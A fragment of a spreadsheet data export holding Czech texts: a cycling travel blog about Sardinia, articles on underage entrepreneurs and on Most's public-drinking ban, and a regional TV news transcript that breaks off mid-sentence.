    <t>Ostrov kousek od Afriky Bylo nebylo, nastalo září a Mirek dostal toulavé boty. Tedy, dostal je už dříve a tak sedl do autobusu, aby usmířil svou mongolskou krev. Protože Mirkova krevní skupina je nomádská a do Sudet , kde Mirek žije přišla s Džingischánem. No a tak, když to přijde musím naskočit na svého malého koníka a vyrazit. A tak jsme v Brně naložili kola do přívěsu za autobus, nasoukali se na palubu a byli jsme přivítáni a vyrazili jsme. Cesta i když byla po čertech dlouhá ubíhala jaksepatří a ráno nás již vítalo italské slunce. A v Livornu nás jako Jonáše spolkla velryba italského trajektu i s busem. A nejenom nás, protože břicho velelodi bylo nadito k prasknutí všemi možnými dopravními prostředky a po kontrole jako na letišti jsme vstoupili na palubu a trajekt odrazil od břehu. Čekala nás dlouhá, ale příjemná plavba kolem břehů Korsiky a za tanců a zpěvů italských pasažérů jsme dorazili do přístavu. Do přístavu ostrova nedaleko Afriky , který se jmenuje Sardinie . Tedy vylodili jsme se, dorazili do kempu a absolvovali první briefing ohledně dalšího programu, protože jsme byli účastníci outdoorového zájezdu, který s námi vymetl mnoho koutů tohoto překrásného ostrova. Bylo to deset dní v ráji, protože Sardinie rájem je a taky je pavučinou, která lapá všechny ty mnohé mouchy dychtící po kráse a už nikdy je nepustí zpět. A to ani i když se vrátí domů, protože myšlenkami zůstanou tady. A ani já to nemám jinak. A tak vám napíšu pár článků o tom, proč tomu tak je. Ke každému vám přidám video, abyste sami viděli a pár fotek k tomu a tohle je povídání první. Jakožto cyklista, který má letos hodně natrénováno jsem při volbě tras na brífincích volil variantu těžší, tedy za bé. Čímž jsem se pokaždé vydělil z kolektivu, protože například trasa na Monte Limbara, z té bolí nohy už jen, když o tom čtete v itineráři. Ale dorazili jsme busem na výchozí bod a když jsem se odpojoval od zájezdu, byl jsem ten, kdo tam jede a pokynul jsem ostatním rukou a oni zase mně a pak jsem zmizel v italském provozu. Italský provoz má dvě varianty. V Itálii severní, která byla po staletí součástí naší rakouské vlasti se jezdí jako v civilizaci. V Itálii jižní a na Sardinii ovšem platí pravidlo jediné. Žádné. Dopravní značení má jak jsem usoudil pouze doporučující charakter a přednost má zásadně větší auto. Nuže cyklista je nutně až na konci potravního řetězce a tak když jedete jedním z italských městeček v sardinských horách a ukážete rukou do provozu, že hodláte odbočit vlevo, tuto vám vzápětí málem urazí vozidlo, které vás za kvílení pneumatik předjíždí a vy se rychle naučíte, jak se na Sardinii chovat :-) Rovněž na vás tamní řidiči troubí zezadu, když je máte za zády, abyste se nelekli, což vás vyděsí tak, že jste rádi, že neskončíte pod jeho nárazníkem a na tamních silničkách na tři facky svým dresem leštíte kapoty předjíždějících vozidel, protože tam není místa nazbyt. Ale když přežijete tento rychlokurs tak vyrazíte někam dál a výš než obyčejný smrtelník. Tedy sám ďábel vás ponoukne, abyste vyjeli na Monte Limbara, což je majestátní hora tyčící se zdaleka a hrozící prsty antén americké letecké základy každému opovážlivci, který by ji snad chtěl pokořit na bicyklu. No a to je něco pro mně, pro Mongola s haploskupinou původního Evropana, což je člověk buď peklo nebo ráj, ale nic mezi tím. A tak jsem projížděl zvlněnou cestou, která najednou odbočila do lůna lesů a stoupal jsem. Na Monte Limbara je to hezkých dvanáct kilásků. A to kilásků hezky hustejch, ale i ty hustý jsou jen na rozdýchání, protože to pravé maso začne teprve o něco později, když si cyklista říká, že se to už bude mírnit. Ale kde ty věci, teprve tam začíná to pravé cyklistické právo útrpné, ale kdo se dal jednou na mučení musí už něco vydržet, půjčit si v kyslíkové bance a jet na dluh. A tak stoupám již téměř kolmo vzhůru a občas protijedoucí Němci na motocyklech kývají uznale hlavou a zdvíhají palec na mou podporu a Italové ve fiátcích zase divoce gestikulují, aby mne odradili od mého sebevražedného pokusu, ale nakonec mi i oni mávají a kroutí hlavami. Inu na Sardinii jsem exot již svými sto devadesáti centimetry, protože Sardiňan dorůstá maximálně 160 cm a kolu se vyhýbá jako čert kříži. Však kdybyste viděli ty kopce, pochopíte. Ale nic mne nemůže zadržet a když přijíždím do Monte Limbara Pass a mám toho plný brejle dochází mi, že je to nahoru ještě skoro pětikilo výškových metrů a pár kilometrů a tak zatínám zuby a beru si i kyslíkovou hypotéku a jedu. Cesta je lemována lesy a vede mne kolem nádherných výhledů, z nichž se točí hlava. Ale naštěstí je na Sardinii touto dobou již pro cyklistiku ideální teplo okolo dvacet pěti stupňů a tady nahoře je příjemných osmnáct, což je má obvyklá jesenická provozní teplota a tak mohu svou sílu dát všechnu do zdolání vrcholu. A ten se pomalu ale jistě blíží. Z lesů a skal vystupují antény a radary US Air Force základny na vrcholu, Bůh žehnej Americe a zastavit se teď tak se už nerozjedu, protože to je kolmo. Za chvíli budu na úplném vrcholu, ale dochází mi, že tam nebude nikdo, kdo by mi udělal vrcholové foto a tak s italskou gestikulací zastavuji auto v protisměru s postarším italským manželským párem a manžel vyhání manželku, by mne zachytila a já zapomínám vypnout kameru a tak mám tento slavný okamžik zachycen :-) A pak vyjíždím až nahoru, ale je tam již konec cesty a dál se nesmí a potkávám jednoho Francouze, bonjour monsieur, dáváme se do řeči a on s dobrou angličtinou vysvětluje, že prochází pěšky sardinské hory a tak ho poprosím o ještě jedno foto a bavíme se o Praze , kde byl a o pivu a o Oktoberfestu a slibuji mu ,že až se potkáme v Práglu, že má u mě bahno. Což není poslední bahno, které jsem slíbil, ale o tom až v dalším díle. Trochu si odpočinu, ale ne moc, protože jsem celkem nadupanej a síly mám dost a dám se pomalu do sjezdu, při kterém dodržuji jednoduché pravidlo, které jestli mi mnohokrát nezachránilo život, tak zdraví nepochybně. Protože ono pravidlo zní, že čím větší kopec, tím jej sjíždím pomaleji. Což se mi vyplácí ve vracečkách, kde na mne občas vybafne auto a tak jsem po chvíli živ a zdráv zpět na cestě odkud jsem odbočil vzhůru a vydávám se na cestu do kempu, což je ještě opravdu hezký kus cesty. Protože dnes nalítám na kole hezkou devadesátečku a tisíc šest set výškových metrů, ale Monte Limbara mi již nehrozí, nýbrž mi přátelsky kyne na pozdrav. Protože jsem si ji zasloužil. No a v Cannigione, kde mám svůj momentální sardinský domov vletím po příjezdu do moře a zaplavu si a vlny mi udělají masáž a pak bude véča a další briefing o zítřejší trase a pak si dám pivo nebo víno a budu si ještě jednou na strop domova na ostrově kousek od Afriky promítat dnešní trip. Což vy mešúrs nemusíte, protože tady je ono slíbené video. A tady je zase pár fotek. Korsika . V přístavu. Sardinské ráno. Káva a panada, kvůli panadě, maso v těstu, bych to jel ještě jednou :-) Nuragh, je jich tam okolo sedmi tisíc. Pozůstatek nuraghské civilizace. No jo no... :-) Výš a dál už to nejde. Monte Limbara. Zasloužená odměna. Miroslav Václavek Šumperk , Sardinie a tak dál... Autor: Miroslav Václavek Autor Miroslav Václavek</t>
  </si>
  <si>
    <t>20241001_65_2996282199_b6f6dbcbb7a1d5c6bcb2.html</t>
  </si>
  <si>
    <t>b6f6dbcbb7a1d5c6bcb2</t>
  </si>
  <si>
    <t>Nezletilí podnikatelé? Ve světě běžné, u nás stále spíše rarita</t>
  </si>
  <si>
    <t>Nezletilí podnikatelé? Ve světě běžné, u nás stále spíše rarita Influenceři, grafici, programátoři a IT testeři. I když je podnikání u nás stále jednoznačnou doménou dospělých, pomalu přibývá případů, kdy si vlastní byznys zřizují mladí ve věku hluboko pod hranicí dospělosti. Zákon to umožňuje, je ale třeba překonat několik právních překážek. Legislativa u nás, ale i například v Německu , je přísnější než třeba v USA , kde je podnikání mladých relativně snazší a běžnější. „V České republice potřebují nezletilí pro podnikání souhlas zákonných zástupců a schválení soudu,“ uvedl Daniel Macek z advokátní kanceláře MACEK.LEGAL, která se mimo jiné na podobné případy mladých podnikatelů zaměřuje. Zájemci o podnikání, kterým ještě nebylo 18 let, mají podle něj tři možnosti. „První varianta je, že se rozhodnou podnikat prostřednictvím odpovědného zástupce, který ale musí splňovat všeobecné i zvláštní podmínky provozování živnosti. Navíc jeho ustanovení musí schválit soud,“ vysvětlil Macek. Druhou možností je podle něj obrátit se na soud a požádat o souhlas s konkrétní samostatnou výdělečnou činností. „Zájemce musí mít souhlas zákonného zástupce a musí počítat s tím, že bude u soudu prokazovat celkovou vyspělost a předpoklady k danému podnikání,“ upřesnil Macek. Případný souhlas soudu se způsobilostí se pak vztahuje pouze na danou samostatnou činnost. Třetí možností, připomíná Daniel Macek, je požádat soud o přiznání svéprávnosti. „Pokud soud návrhu vyhoví, není už k podnikání potřeba žádná další odpovědná osoba a veškerá obchodní rozhodnutí může činit mladý podnikatel sám,“ dodal s tím, že přiznaná svéprávnost nezletilému se ale nevztahuje třeba na omezení pití alkoholu , možnost řídit auto nebo na volební právo. Podobně je tomu i v dalších evropských zemích. Naopak v USA není na federální úrovni žádné omezení a v mnoha státech není pro podnikání ani stanovený žádný minimální věk. Podle údajů českého Ministerstva průmyslu a obchodu ( MPO ) bylo u nás ve druhém čtvrtletí tohoto roku evidováno 25 fyzických osob s živnostenským oprávněním pod 18 let. Ve skupině 18-20 let jich již bylo celkem 9 679. Podle Daniela Macka ale zájemců o podnikání z řad nezletilých přibývá. „V poslední době jsme řešili třeba případ mladého programátora, který již dostával zakázky v takové míře, že musel být schopen například vydávat faktury.“ Mladí chtějí podnikat v IT a sociálních sítích Studie Eurostatu z roku 2022 mezi mladými ve věku 15–30 let ve všech 27 zemích EU ukázala, že téměř každý druhý respondent (46 %) by uvažoval o založení vlastního podniku, ačkoli k tomu ještě nepodnikl žádné kroky. Pouze 9 % již začalo podnikat a dalších 14 % podniká kroky k zahájení podnikání. Jako obor vlastního podnikání by si nejčastěji zvolili odvětví IT, internetu, elektronického obchodu nebo sociálních médií (13 %), dále pak umění, design, kulturu (10 %), obchod, prodej a maloobchod (9 %) a pohostinství, zábavu a cestovní ruch (9 %). Jako největší překážku v podnikání vidí mladí nedostatek kapitálu, 37 % z dotázaných. Čtvrtina pak uvedla jako největší překážku přílišnou byrokracii a administrativu. Zdroj: MACEK.LEGAL Jak soud rozhoduje o žádostech o přiznání svéprávnosti? Zdroj údajů MPO: https://www.mpo.gov.cz/cz/podnikani/zivnostenske-podnikani/statisticke-udaje-o-podnikatelich/pocty-podnikajicich-fyzickych-osob-a-zivnostenskych-opravneni-dle-vekove-struktury–225459/ Zdroj Eurostat : https://europa.eu/eurobarometer/surveys/detail/2670</t>
  </si>
  <si>
    <t>3750</t>
  </si>
  <si>
    <t>2870</t>
  </si>
  <si>
    <t>20241001_66_2997280924_5d7a8ef6d14144d7115a.html</t>
  </si>
  <si>
    <t>5d7a8ef6d14144d7115a</t>
  </si>
  <si>
    <t>Most rozšířil zákaz pití alkoholu na veřejnosti</t>
  </si>
  <si>
    <t>Most rozšířil zákaz pití alkoholu na veřejnosti Pavla KOSÍKOVÁ, moderátorka: Most rozšířil zákaz pití alkoholu na veřejnosti. Nařízení teď nově platí také na sídlištích a v okolí sociálně vyloučených lokalit. Právě tam strážníci výtržnosti spojené s alkoholem řešili nejčastěji. Barbora LANCOVÁ, redaktorka: Centrum města v 10 hodin dopoledne. Strážníci tu řeší nepovolené popíjení na veřejnosti. Alkoholovou vyhlášku nejčastěji porušují sociálně slabí anebo lidi bez domova. Obvykle se scházejí ve vyloučených lokalitách anebo v parcích a na zastávkách. Od dubna, kdy začalo nové nařízení platit, strážníci rozdali více než 500 pokut. Jaroslav HRVOL, ředitel MP Most: Jelikož ta vyhláška platí téměř po celém městě, tak těch přestupků je mnohonásobně víc. Oproti roku 2023 je to čtrnáctinásobné navýšení. Barbora LANCOVÁ, redaktorka: Popíjení alkoholu je zakázáno v okruhu 100 metrů od školy nebo zdravotnických zařízení. Výjimkou jsou například předzahrádky anebo restaurace. Třeba tahle známá vyhlášená Severka . I tady lidé často vysedávají. Zákon tu ale neporušují. Václav ZAHRADNÍČEK, náměstek primátora Mostu /Pro Most /: Chtěli jsme zajistit, aby hlavně v okolí takových těch večerek lidé měli klid a nebyli konfrontováni s tím nežádoucím chováním. Barbora LANCOVÁ, redaktorka: Vnímáte jako nějaký zlepšení za tu dobu? Petra, obyvatelka Mostu : Jako by neřekla bych, úplně to nějak nepociťujeme jako asi. Barbora LANCOVÁ, redaktorka: Za porušení vyhlášky může lidem hrozit pokuta až do výše 10 000 korun.</t>
  </si>
  <si>
    <t>328740</t>
  </si>
  <si>
    <t>20241001_67_2996378719_74664461b9849b6bb4d2.html</t>
  </si>
  <si>
    <t>74664461b9849b6bb4d2</t>
  </si>
  <si>
    <t>Události v regionech (Praha): 1. října</t>
  </si>
  <si>
    <t>Události v regionech ( Praha ): 1. října UDÁLOSTI V REGIONECH Ministr zahraničí Jan Lipavský zůstává členem vlády i po odchodu pirátské strany z kabinetu. Pokračovat bude jako nestraník. Vicepremiér a ministr práce a sociálních věcí Marian Jurečka dočasně převzal resort pro místní rozvoj. Nárůst počtu pacientů se žloutenkou typu A. Potvrdili ho hygienici na Sokolovsku. V ohrožených kolektivech nařídili speciální protiepidemická opatření. Dva tisíce lidí z bývalé Koněvovy ulice v Praze na Žižkově stále nemají nové občanské průkazy. Lhůtu měli do dneška. Výměna dokladů je nutná kvůli přejmenování dané ulice na Hartigovu. Vítejte u UDÁLOSTÍ V REGIONECH. Piráti opustili vládu Petra Fialy . Členové strany to potvrdili v hlasování na svém internetovém fóru. Z vládní pětikoalice už tak rok před volbami zbyla čtyřkoalice. V křesle ministra zahraničních věcí ale nadále zůstává Jan Lipavský , který z Pirátské strany vystoupil. -On demisi podal, to není tak, že by ji nepodal, písemně mi ji donesl, akorát jsme vedli rozhovor, po kterém se rozhodl, že ji vezme zpět. -Bylo to moje rozhodnutí odejít ze strany, které mi uvolnilo ruce, zadruhé samozřejmě velká míra podpory od ostatních koaličních partnerů, které si opravdu velmi vážím. -Zatímco nového ministra pro legislativu, nástupce Michala Šalamouna, premiér hledat nebude, vedením resortu pro místní rozvoj pověřil šéfa lidovců Mariana Jurečku. Jeho prioritou je mít digitalizované stavební řízení funkční v řádu týdnů. Posílí proto tým, který na systému pracuje. Rozšířit chce také pomoc na obnovu oblastí, které zasáhly povodně. -Pro mě je osobně důležité, abychom už nehleděli na to, co bylo, ale abychom se snažili maximálně napřít síly k tomu, abychom dokázali v řádu týdnů rozpohybovat systém tak, aby fungoval, aby lidé na úřadech stavebních dokázali odbavovat tu agendu. A teď ještě pohled do krajů, respektive do kraje Pardubického, kde dnes politici podepsali novou koaliční smlouvu. Další čtyři roky povedou region uskupení 3PK, vítězné hnutí ANO, Koalice pro Pardubický kraj a ODS s TOP 09. Subjekty se na spolupráci dohodly už krátce po krajských volbách. V 45členném zastupitelstvu budou mít 37 mandátů. Post hejtmana by měl zůstat už počtvrté v řadě Martinu Netolickému , ačkoliv jeho 3PK skončilo ve volbách jako druhé. -V průběhu volební kampaně jsme neslyšeli žádné populistické rozdávání z krajského rozpočtu, žádné rozhazování peněz všemi směry, jak to bylo v předchozích obdobích, ale skutečně konstruktivní přístup i programový a ten se projevil i v průběhu koaličních jednání. -Za dané situace nechci říct, že necítíme křivdu, my jsme rádi, že se budeme podílet, že jsme součástí koalice, ale budeme chtít určitě být vidět a slyšet, protože 30 procent voličů nám dalo hlas. To další jednání o koalici v Královéhradeckém kraji výsledek nepřineslo. Vítěz voleb hnutí ANO se už podruhé sešel v pořadí s druhým, tedy Silnými lídry, které tvoří koalice ODS , lidovců a Východočechů. Možní partneři, kteří by dali dohromady silnou většinu 31 křesel v 45členném zastupitelstvu, se opět nedohodli. Žitenice na Litoměřicku začnou jednat o koupi tamního zámku. Dohodli se na tom po včerejší pětihodinové schůzi. S vyšehradskou kapitulou, která zámek vlastní, bude jednat bývalá starostka, která o získání památky pro obec dlouhodobě usilovala. Rozhodlo o tom nové vedení, které před několika týdny starostku odvolalo. Na úřad ji včera přišli podpořit místní obyvatelé. -Nejradši bychom nové volby, aby došlo k legitimizaci kroků a narovnání všech těch vztahů, protože demokratické volby jsou jediné asi východisko. -Chápu, že příznivci starého vedení obce přišli vyjádřit podporu odvolané starostce a místostarostce, na druhou stranu lidí, kteří s námi souhlasí, je taky mnoho. Most rozšířil zákaz pití alkoholu na veřejnosti. Nařízení teď nově platí také na sídlištích a v okolí sociálně vyloučených lokalit. Právě tam strážníci řešili nejčastěji výtržnosti spojené s alkoholem . -Co jste všichni na kamerách, jak popíjíte alkohol . -Já ne. -Já jsem tu flašku našel. -Jasně! Všichni jste to našli. -Centrum města v 10 hodin dopoledne. Strážníci tu řeší nepovolené popíjení na veřejnosti. Alkoholovou vyhlášku nejčastěji porušují sociálně slabí anebo lidi bez domova. Nejčastěji se scházejí třeba tady ve vyloučené lokalitě nebo v parcích a na zastávkách. -Oni to mají schovaný, někdy to videt není, někdy to mají v batohu, oni už to vědí. -Od dubna, kdy začalo nové nařízení platit, strážníci rozdali více než 500 pokut. -Jelikož ta vyhláška platí téměř po celém městě, tak přestupků je mnohonásobně víc oproti roku 2023, je to čtyřnásobné navýšení. -Popíjení alkoholu je zakázáno v okruhu 100 metrů od školy nebo zdravotnických zařízeních. Výjimkou jsou předzahrádky nebo restaurace. Třeba tahle slavná a vyhlášená Severka. I tady lidé vysedávají, zákon tu ale neporušují. -Chtěli jsme zajistit, aby hlavně v okolí těch večerek lidé měli klid a nebyli konfrontováni s tím nežádoucím chováním. -Vnímáte nějaké zlepší za tu dobu? -Neřekla bych, my to nějak nepociťujeme asi. -Za ten alkohol dnes vám udělujeme domluvu s tím, že ale už popíjet tady nebudete, nikde takhle na veřejnosti. -Za porušení vyhlášky může lidem hrozit pokuta až do výše 10 tisíc korun. Boj s nelegálními billboardy na jihu Čech pokračuje. Díky nedávné novele zákona je teď jednodušší reklamní poutače odstranit. Ve spolupráci s krajským úřadem a Ředitelstvím silnic a dálnic jich tak České Budějovice odvezly z ochranných pásem desítky. Pomoci ale může i nová aplikace. Jedno z míst, kde už železná konstrukce není. Město si na práci najalo soukromou firmu. Po hromadném odstranění billboardů zmizel reklamní stojan z okolí rušné křižovatky nedaleko českobudějovického nádraží. Ke změně došlo i podél jedné z nejrušnějších silnic v kraji. -Tady jich bylo kolem 10 a teď když se podíváte, -Tady jich bylo kolem 10 a teď, když se podíváte, najdeme tady dva, které dokážu hodnotit jako nelegální. -Majitelé je totiž třeba jen posunou na pozemky kraje či státu. -Nepovolené reklamní poutače jsou buď přímo u silničního pozemku, nebo jsou třeba v ochranném pásmu u dvojek, trojek silnic. To je 15 metrů od osy komunikace. -Jsme vytipovali ty, které byly jednak v ochranném pásmu a jednak na pozemcích ŘSD. Minulý týden proběhlo odstranění 14 kusů. -Zaměstnanci Správy a údržby silnic Jihočeského kraje letos odstranili 140 nelegálních konstrukcí po dohodě s majiteli. Dalších 70 jich zabavili i díky nedávné novele zákona. Reagovat museli i podnikatelé. -Město současně spustí aplikaci, kdy sami žadatelé budu moci v aplikaci namodelovat svůj billboard a dostane se mu odpovědi, jestli je nebo není v ochranném pásmu. - České Budějovice za odstranění velkoplošných reklamních nosičů letos zaplatilo téměř 2 miliony korun. V Karlovarském kraji se ve zvýšené míře objevila žloutenka typu A. Nejvíc případů je podle hygieniků na Sokolovsku, respektive v Horním Slavkově . Kvůli šíření nákazy už muselo upravit svůj provoz infekční oddělení Karlovarské nemocnice . Kolik případů hygienici evidují, a to i v meziročním srovnání, je otázka na Zdeňka Mlnaříka , kterému přeji dobrý podvečer. -Dle posledního sčítání případů na Karlovarsku je celkem 42, což je 88% nárůst proti loňsku, protože loni za stejné období tu bylo případů celkem 5. Nemocnice musela upravit fungování infekčního oddělení, museli odizolovat některé pacienty i proto, že nejen tady v kraji, ale i jinde po ČR přibývá nemocných covidem. Některé provozy, školy a podobná místa, už udělala hygienická opatření. Například ve škole v Horním Slavkově s nejvíce nakaženými byly instalovány stojany s dezinfekcí a rodiče byli informováni krajskou hyginickou stanicí. -Všem epidemiologicky významným kontaktům nemocných byla nařízena karanténní opatření, lékařský dohled, který spočívá v povinnosti podrobit se lékařské prohlídce, opakovaném laboratorním vyšetření krve, důslednému dodržování základních lidských návyků, to znamená mytí a dezinfekce rukou a omezení některých aktivit, například účasti na hromadných akcích, návštěvy bazénu a sauny. Český telekomunikační úřad prověřoval obchodní podmínky firem, které nabízejí doručení nebo odesílání zásilek ze samoobslužných boxů. Reagoval tím na stížnosti zákazníků. S některými doručovateli už kvůli zjištěným pochybením zahájil správní řízení. Jsou na každém kroku, někdy i několik vedle sebe. S jejich počtem roste i zájem lidí o jejich využívání. -Se to snažím dát právě do těch boxů, je to nejpříjemnější věc, protože tam můžu kdykoliv. -Pokaždé, když něco objednávám, mám radši boxy, než někam jít do výdejních míst. -To, jak mají jednotlivé firmy nastavené poštovní podmínky, teď prověřoval Český telekomunikační úřad. Reagoval tak na podněty od veřejnosti. -Často si stěžují na krátké úložní doby, přesměrování zásilky nebo třeba na nefunkční otevření. -Právě úložní doby se liší u jednotlivých firem. Totéž platí i pro možnost jejich prodloužení. -U nás je výdejní doba v Parcel boxech nastavena na tři dny, celoročně v podstatě. -Aktuálně má zákazník od doručení zásilky do boxu čas do půlnoci následujícího dne. -Počty samoobslužných míst v posledních třech letech rostou. Další rozšiřování sítě společnosti plánují. -Určitě nezůstaneme u těch dvou tisíc, ale plánujeme další rozšíření v Česku. -Aktuálně máme v provozu 1100, dalších 200 čeká na aktivaci. Do Vánoc chceme mít 2000. -Našli jsme nějaká pochybení, ale v tuto chvíli běží právní řízení, ale v tuto chvíli běží správní řízení, takže nemohu podrobněji. -O které konkrétní firmy se jedná, úřad zveřejní až po konci správního řízení. Trvat může v řádu týdnů až měsíců. Za pochybení může hrozit i pokuta. Místo šesti hybridních trolejbusů jich v Jihlavě jezdí stěží polovina. Zbytek stojí kvůli závadám. Dopravní podnik pořídil ekologické vozy před rokem. Od té doby ale stále řeší problémy s bateriemi, trakčními motory nebo třeba elektrickou výzbrojí vozu. Už proto přistoupil i k sankcím za pozdní opravy reklamovaných závad. Nepojízdné vozy totiž musejí suplovat 18 let staré naftové autobusy. -Není výjimkou, že odstranění závady trvá i víc než měsíc. Máme tři čtvrtě na dvě odpoledne, přepravní špička, jezdí náhradní doprava za odstavené vozy. Aktuálně dnes je situace taková, že tři vozy jsou odstaveny na opravy a pouze tři jezdí. Nové autobusy za peníze z pokut z měřeného úseku v Liberci , právě z toho, na kterém řidiči platí za překročení rychlosti i o 1 kilometr v hodině. Radnice od nich už vybrala skoro 15 milionů korun. Jestli za ně dopravní podnik bude moci vozový park rozšířit, ještě musejí schválit zastupitelé. Silnice vedoucí k ještědskému hřebeni. Dvojice radarů tady měří okamžitou i úsekovou rychlost. Povolenou padesátku za půl roku překročilo více než 33 000 řidičů. Nejvíc jich bylo v dubnu po uvedení radarů do ostrého provozu. V následujících měsících už byli opatrnější. -Od dubna do konce letošního září se vybrala částka necelých 14 milionů korun. -Liberecký magistrát už má jasno, jak s penězi naloží. -Peníze budeme používat na nákup nových autobusů, protože chceme podpořit autobusovou a MHD dopravu před tou individuální. -Náš příspěvek na autobusy je asi 27 tisíc korun, než nám přišla první pokuta a začali jsme si dávat větší pozor. -Kamarád má půjčené moje auto a za něj jsem zaplatil asi šest pokut. -A to za překročení rychlosti o 1 kilometr v hodině. Kritiku sklízel magistrát nejen za téměř nulovou toleranci. Řidiči požadovali, aby byl měřený úsek alespoň označen. A když se cedulí nedočkali, tak přetvořili tento poutač libereckého Divadla F. X. Šaldy. -Zpomalí ho přece informace, bacha, měříme rychlost. -Místní lidé si ale účinnost radarů pochvalují. Úsek se třemi přechody pro chodce je teď podle nich daleko bezpečnější. -Určitě se to zlepšilo, poměrně dost výrazně. Je znát, že doprava je tady klidnější. -Spokojený je i dopravní podnik, kterému řidiči přispějí na obnovu vozového parku. -Dopravní podnik určitě vítá nápad pořídit nové autobusy, znamená to vždy zlepšení našich služeb. -Úseků s ostrým měřením má postupně přibývat. Jedním z nich je i tato silnice v Krásné Studánce u Liberce . Také v Oldřichově v Hájích se má v příštím roce tento orientační radar změnit na ostrý. První část Událostí v regionech je za námi. A co nás čeká v té další? Kvůli šíření respiračních onemocnění lékaři doporučují očkování proti covidu i chřipce. Například v Ústí nad Labem proto znovu otevřeli očkovací centrum. A zavítáme na orlickou přehradu , kde teď prochází testováním speciální hydroplán. Kvůli většímu výskytu respiračních onemocnění opět funguje v nemocnici v Ústí nad Labem očkovací centrum. Zájemci o vakcíny proti covidu nebo chřipce, ho můžou využít každé úterý od 7 ráno do 6 večer. Čekárnu plnili hlavně senioři, a to i přesto, že primárně očkují praktičtí lékaři. -Protože někteří lidé nemají praktického lékaře nebo někteří praktičtí lékaři neočkují. -Proti chřipce a covidu, obojí. -Chodíte pravidelně? -Pravidelně. Na chřipku pravidelně. -Proti chřipce a covidu. -Vyhovuje vám, že jste mohl přijít takhle do najednou do nemocnice? -Vyhovuje mi to, protože je to najednou, absolvujeme to každý rok. -Vakcínu proti covidu hradí zdravotní pojišťovny. Proti chřipce pak jen u vybraných skupin obyvatel. -Jsou to zejména senioři. Každý, kdo je starší 65 lel, -Jsou to zejména senioři. Každý, kdo je starší 65 let, pak jsou to lidé se závažnými interními chorobami. -Od začátku pandemie v roce 2020 ministerstvo zdravotnictví eviduje přes 4,5 milionu případů, z toho jedna sedmina byli senioři. Očkovaných pacientů ministerstvo eviduje přes 19 milionů. Že se nemoc vrací, potvrzují i lékaři. Už teď v září na infekčním oddělení ústecké nemocnice se léčilo několik pacientů. -My jsme měli 10, 12 pacientů na oddělení s covidem. To není vůbec málo a je to tak, že nyní začíná vlna covidu. Chřipka přijde později. -Sezonní očkovací centrum Krajské zdravotní najdou pacienti v pavilonu I. Otevřeno má každé úterý kromě svátků až do 18 hodin. Až 2000 obyvatel bývalé Koněvovy ulice v Praze si stále nevyměnily občanský průkaz. Dnes jim přitom vypršela roční lhůta poté, co se nejdelší žižkovská ulice přejmenovala na Hartigovu. Pokud si lidé nevymění doklady ani do ledna, budou je mít neplatné. Vyhledávané řeznictví na Koněvově je teď řeznictví na Hartigově. Zákazníkům se cesta nezměnila. I na vizitce stále stojí jméno původní ulice. -Protože jsme měli natisknuto třeba v tisících. A jelikož je to taky nějaká investice, tak necháme to dojet postupně, zákazníky upozorňujeme na to. -Další várka už ale ponese nové sídlo firmy. Že jsou občas zákazníci ze změny zmateni, potvrzují i ve vedlejším obchodě. -Většinou starší lidi, kteří tady chodili 40 let, tak se ptají, kde to je a jak se sem dostanou. A pak zjistí, že to je Koněvova bývalá, takže už jsou potom doma. -Že si myslí, že jste se přestěhovali? -Přesně tak. -Z řady míst ale Koněvova zatím nezmizela, jako třeba z různých reklamních poutačů, bannerů nebo informačních cedulí jako například v tomto případě. Změnit adresu si muselo 500 firem a asi 5000 obyvatel vyměnit občanský průkaz. Až 2000 z nich to ale ani po roce neudělalo. Měnil jste si občanku? -Neměnil ještě. -Proč ne? -Protože ještě do roka je to. Tak ještě mám čas. -Ale to je dnes, ten rok. -Tak jak budu moct, tak tam půjdu, nemám čas na to. -I po skončení lhůty si může průkaz vyměnit zdarma. Pokud to ale nestihne do konce roku, bude neplatný. -Teď startuje proces zahájení správního řízení o ukončení neplatnosti stávajících občanských průkazů, což potrvá ještě tak čtvrt rok. -Problém to může být třeba u voleb nebo při prokázání se v bance či před policií. Cedule pojmenované po kontroverzní sovětském maršálovi nechala radnice vyměnit před rokem. Dvě cedule se vydražily. Každá za 30 tisíc. Jednu si městská část ponechala pro archivní účely. Až na stane ta správná příležitost, tak ji vystaví. Mezi Hradcem Králové a obcí Sadová silničáři začali s výstavbou dalšího úseku dálnice D35. Hotový má být za dva roky. V Pardubickém kraji začali stavět obchvat Sezemic. Z města má odvést tranzitní dopravu a zároveň sloužit jako přivaděč k dálnici D35. Celníci odhalili nelegální internetový prodej tabáku. Prověřují muže z Plzeňska, který si měl podle nich zásilky z Německa objednávat, ve sklepě zpracovávat a následně prodávat přes inzeráty. Dovézt měl přes 1300 kg tabáku, a tím připravit stát na daních zhruba o 4 miliony korun. V tabákových listech celníci navíc objevili živé červy. Zvony v Larischově vile se pravidelně rozeznějí 19x v roce, vždy jako připomínka dne a hodiny, kdy se tu konaly popravy. V těchto třech sklepních místnostech byli těsně před svým zavražděním vězněni obyvatelé vypálených Ležáků. Expozice by se měla rozšířit. -Tady se budou dávat expozice, které mají připomínat domácí odboj, to znamená Obranu národa, bude to symbolicky v podzemí jako podzemní hnutí. -Vilu její vlastník, Československá obec legionářská , opravuje už několik let a teď získala 70 milionů korun z evropských fondů. Podmínkou je dodat postupně dalších 30 milionů. Hotovo by mělo být v roce 2028. -Pevně věříme v další spolupráci s Pardubickým krajem , městem Pardubice , s ministerstvem kultury. -Budoucí muzeum by mělo dát návštěvníkům možnost vžít se do role historických postav. Budou moci třeba vyzkoušet dobovou překážkovou dráhu, na které se cvičili parašutisté. Do budoucna by tu měla stát i napodobenina trupu létající pevnosti B-17, které za světové války bombardovaly Pardubice . V plánu je i zrekonstruovat poslední cestu obětí na někdejší popraviště Zámeček, zatím tomu ale brání pozemky soukromé firmy. -Kdyby se podařilo to propojení, tak by to byla obrovská přidaná hodnota. -Hezčí podoby by se mělo dočkat i samotné okolí památníku Zámeček. -Chceme to zpřístupnit lidem. aby z toho bylo nejenom pietní místo, které samozřejmě zůstává a je pro nás důležité, ale i kulturní centrum, daly by se tady dělat výstavy, setkání lidí. -Jde o to, aby návštěvník měl prostor trochu ten zážitek vstřebat a zastavit se u něčeho méně temného. -Revitalizovat by se měl tento prostor, konkrétní představy ale zatím nejsou. Studie je na začátku. Hotová by měla být do konce roku. Speciální testování nového hydroplánu na hladině orlické přehrady . Prováděl ho tam výrobce. Využívání takových letounů v Česku není povoleno. Stroj má zamířit k zákazníkovi do Ameriky . Aby letadlo vzlétlo, musí nabrat rychlost 80 kilometrů za hodinu. Zatímco letové vlastnosti hydroplánu už jsou otestované, přímo na vodě ho 